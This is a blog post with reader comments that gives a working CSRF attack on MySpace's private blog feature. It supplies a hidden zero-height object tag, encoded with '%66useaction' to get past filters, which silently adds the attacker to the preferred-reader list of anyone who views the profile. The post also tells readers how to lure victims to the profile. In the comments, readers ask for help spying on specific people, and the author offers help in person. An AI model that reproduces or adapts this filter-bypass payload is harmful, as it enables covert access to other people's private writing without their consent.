Are you as nosy as me? Do any of your MySpace friends have blogs that only their ‘preferred’ friends can read? Does this hurt your feelings and make you want to send them a frowny face?! Well, here’s a little bit of code that can help, and the steps it took to create it. It will add you to anyone’s preferred list that looks at your profile, providing one little requirement is met.
Now we all know, that when you put an IMG tag in a site, the browser tries to access the picture file specified. When the ‘picture file’ specified isn’t so much a picture, but more a query string that contains data that instructs certain sites to perform an action…the results can be “very nice” -Borat. For example when you access the URL:
http://blog.myspace.com/index.cfm?fuseaction=blog.addToPrivateList&friendID=182315
You’d be telling MySpace to add friend ID 182315 (random) to your preferred list. If you set the “img src=” to that URL then your browser would try accessing it blindly. Though the browser doesn’t render the page, and thus does not let it set cookies or even load per se, the server still sees the access just like any other request and completes the action on behalf of the user. This type of exploit (CSRF) could be used as described above were it not for the following protection mechanisms built into MySpace:
- Filters all IMG tags in which the extension of the SRC is not a valid image extension (.jpg, .gif, .png, etc).
- Filters the word ‘fuseaction’ anywhere within your profile and links.
When MySpace filters such things, it will replace the offending part with two dots (..). With all other MySpace actions such as adding friends, profile edits, and such there is a temporary key generated that must be submitted with all other parameters, effectively protecting from this type of exploit. As for the subject of this article, preferred reader list, there is no such temporary key. How do we defeat the two filters in place to foil our awesome plot?
We know it filters IMG tags, and does not allow an IFRAME at all. What other tag accesses an external file? My answer: embed. So I embed the URL above using
<embed src="http://blog.myspace.com/index.cfm?fuseaction=blog.addToPrivateList&friendID=182315"></embed>
I submit the changes and lo and behold it replaces it, but with an object tag instead…in order to block non-authorized content using specific parameters. The URL is intact but for one little part:
http://blog.myspace.com/index.cfm?..=blog.addToPrivateList&friendID=182315
fuseaction is gone. Okay so how would we fix that? So, we know that characters can be replaces with character codes, such as when you see a space in a URL replaced with %20 (32 decimal, 20 hex, space). I figure it only filters the whole string “fuseaction” and quickly look up the hexadecimal value of f (lowercase, probably doesn’t matter) and find it to be 66. So I pop in my new and improved string, with f replaced with %66 and get
<embed src=http://blog.myspace.com/index.cfm?%66useaction=blog.addToPrivateList&friendID=182315 />
MySpace of course replaces this with an object tag, but everything works. So I change the height to 0 as to leave it unnoticed and paste it anywhere in my profile:
<object allowscriptaccess="never" allownetworking="all" height="0" data="http://blog.myspace.com/index.cfm?%66useaction=blog.addToPrivateList&friendID=YOURFRIENDID" width="425"> <param name="allowScriptAccess" value="never" /> <param name="allowNetworking" value="all" /> <param name="movie" value="http://blog.myspace.com/index.cfm?%66useaction=blog.addToPrivateList&friendID=YOURFRIENDID" /> </object>
You might have to remove some extra spaces because I had to insert them to format the page correctly. Copy and paste into your profile, replace YOURFRIENDID with your actual friend ID. This is not 100%, read why below.
Though the preferred reader list is less protected than anything else there is still a little protection. When you do a search on MySpace for a person, it sets a cookie, this cookie needs to be set in order to add anyone to your preferred list. The cookie, I believe, is only unset when you add someone to your preferred list or when your close your browser/end session. The chance of the cookie still being set when someone visits your profile is decently high, more likely with people who leave their browser open all the time. I didn’t completely investigate the chances, because I have seen it to work, and knowing the probability won’t make it any more or less effective.
As far as MySpace fixing this, I hope they do, I have no reason to keep it private, as I don’t care at all 
Enjoy it while you can!!!!!
Note to people who aren’t getting this to work:
- When you are added to a person’s Preferred Reader List, you will have no verification.
- No, it does not be send invites to people to read your blog.
- Ensure you replace BOTH instances of YOURFRIENDID, you cannot simply copy and paste the code, again there are 2 (two) places it needs to be replaced with your friend ID, which is all numbers.
- This WILL work, provided the condition above is met (there being a recent search on MySpace), so when you’re testing, ensure you’ve done a MySpace friend search (not the main search bar, but when you actually click search in the navigation bar).
- If this doesn’t get you going in the right direction, I will help you out personally.
Update (September 08, 2007)
I have reconfirmed this several times over the last week and it is still working.
Firefox extension: Edit Cookies
addon/4510
It works. You were right, they need the cookie to be set. So they need to have performed a search for someone and not closed their browser.
would you email me privately? i am having trouble with this
i think it sent an invite to them to read my blog …not what i was looking to do
O_o What?
I tried this with my own account as well as a friends account. Nothing happened. At all. Chances are I’m doing something wrong since someone says it apparently work. As pain stakingly annoying as it is, could you perhaps email me or instant message me *hell not just you but anyone* in regards to this? I’m certainly having a bit of trouble with this one =/
Thank you, KittiesGoWoof at Tmail.com
Hey, i copied and pasted the code, put in my friend i.d twice where it was needed, saved the changes and then searched for the friend (she’s in my friend list but yes has a preferred list)
I clicked on her profile but nope, can’t access her blog
Am i doing something wrong?
If so, would you e-mail me and let me know
Much Appreciated, Thanks
Kate
This is passive, you will not need to search for your friend. You will be added to the preferred reader list when your friend views your profile…BUT it’s not 100%, they will have needed to do a MySpace search sometime in the recent past, any search for anyone. You are completely out of control of whether that happens, so it is mostly a waiting game. Also you’ll never get a notification that you’ve been added, nor that the person visited your profile… It can be useful to lure the person into your profile by leaving comments and hoping to get comments back and also bulletins saying “OMG!!!111 Check out my profile LOLOLOL!!!!11″ and such. As I said it’s not 100% but I’ve had pretty good luck with it.
Ah right thanks!
so basically they search for somebody, then view my profile
and then i’ll be able to view there blogs
do they search in the ”Myspace Search” or ”Find a Friend” search?
Yep you’ve got it now. I believe only “Find a Friend” will work for that.
wow this is very cool. thanks
I messaged the girl, basically she is claiming to be this guy in a band -his sister-in-law
she didn’t message me back she’s viewed my profile but she’s obviously not done a search because i can’t get in her blog.
If i gave you her myspace
is there any way you could access the preferred blogs?
there’s probably no loop-hole but i just thought i’d ask
Thanks, Kate.
Also one of her preferred list blogs ISN’T private
i don’t know if that would help you in anyway
but yeah thought i’d mention
Hi Kate, I’m very sorry it’s not working out so well for you. My colleague Jason wanted me to check if she is your friend on MySpace or not, as it may require friend status to work. As immoral as it has been already to teach such techniques, I can’t go any further
. Any shadiness you do is on you 
Yeah she’s on my friends list
Well thanks anyway!
i’ll paste the link anyways, because maybe her blog is different
http://www.myspace.com/shesprincessofmyspace
Thanks, Kate
I had a quick question… do I put in my ID number or whomever’s private blog I wish to see’s ID number?
Jordan,
Could you please email me when you get a chance. I have a very important question that I do not want to ask in a public forum.
mkt_mkr at hotmail.com
Thank you for your time.
ok I tried it a few different ways, and it’s still a no go for me. I see you said you would help us out personally if we can’t get it to work. would you be able to assist me? my email is meelee514 at yahoo.com. thanks!
Hey thanks for the information but I cant get it to work for me
could you help me?
question is when they view their preferred list, will your profile show up alongside everyone else’s that was intended to be preferred?
Yes it’s just like being added manually…they could notice easily…
hey could u help me do this. i want to be added to a preffered list and it didnt work
Ok, I’ve done the search and added the code. I had my friend check my profile…but it didn’t work. Help please.
Well, if it even still does work. Your friend would have to do a search, THEN view your profile. You should then be in her preferred reader’s list. I guess I will try to verify that it still works sometime, I wouldn’t be surprised if MySpace fixed it though.
Will the user be able to see that you are all of a sudden on their preferred list? causing them to figure “oh why that’s odd, I never put them on there how did this happen?”
Please reply on forum. Great hack though.
What a HORRIBLE invasion of privacy. here i was googling a problem with adding a REAL friend to my list.. and i came across this page. although the snoop in me makes me want to try it out of course on people i think are talking about me, i still think its HORRIBLE. just b/c the temptation is there, doesn’t mean i’ll give in to it. i mean, if you go digging for things.. you just might find them..and more!
i write things to vent and relieve stress, things that i ordinarily wouldn’t want to say to someone b/c i don’t really mean it, im just mad.. or maybe i want to share something VERY personal with only a few friends.
i think its really uncool that people would use this.
yes. im human. yes, im nosey. but this is not a line i would cross.
Well guess what, they ARE writing about you! All kinds of terrible things, things no person should EVER have to read about themselves!
Thank goodness you have a moral compass that points truer than the rest of us here at smert…
But let me get real for a moment. The reason things like this get pointed out is to put it enough into the public eye so that it gets fixed. Otherwise, select few people use it to their advantage whilst the rest of us are left out in the cold, and the service provider is none-the-wiser about the vulnerability. If you really want this to stop, petition MySpace to fix it… (It’s really not too hard to fix from their end).
Now, as you are too moral for me…
Good day sir.
I SAID GOOD DAY!
The only horrible invasion of privacy is the fact that MySpace hasn’t fixed this issue in the 5 months it has been publicly available. I would like to point out that there IS NO privacy. Privacy is an illusion and if you submit something to a PUBLIC website you best assume that someone besides you can read it.
Which extra spaces in the code are we supposed to delete? Jordan, Could you contact me to help me out?
oops… e-mail – nantille2891 at hotmail.com – I still can’t get it to work
Edited by Jason
Do you realize that you can put the correct email when you post a comment and it won’t expose it to all the spammers harvesting addresses?
MySpace Private Pictures Leak
“We all heard about the MySpace vulnerability that allowed everyone to access pictures that have been set to private at MySpace. That vulnerability got closed down pretty fast. Unfortunately though (for MySpace) someone did use an automated script to run over 44,000 profiles that downloaded all private pictures which resulted in a 17 Gigabyte zip file with more than 560,000 pictures. The zip file is now showing up on popular torrent sites across the net.”
http://it.slashdot.org/article.pl?sid=08/01/25/1845206&from=rss
I can’t get this to work and I replaced the two spots with my friend ID. Can somebody please email me with a solution? thanks.
i still don’t understand what you’re supposed to do to get on the list. i mean, you add the code to your profile, like in edit profile, then just go to the persons profile and try to read the blog?
thank you, bro
Stop looking at blogs you have been nicely requested not to look at. If you are not on someone’s preferred list, get over it. Hacking your way to read things not are meant for your eyes is WRONG.
hi im david and i dont really understand how to do this.
im wondering if you could help me out
i cant seem to work this thing out?
can you do it for me?
mail me at mata.vivian@yahoo.com
thanx :]
Is this still working? I can’t seem to get the code right. Typically, I wouldn’t read someone’s preferred list blog, but I’ve got a gut feeling that it’s imperative I read a friend’s recent entry.
Please, please help.
MySpace updated their search a few months ago and it no longer has an option to add the person to the prefered list and I probably sure that this won’t be working any more.
The comments have been closed.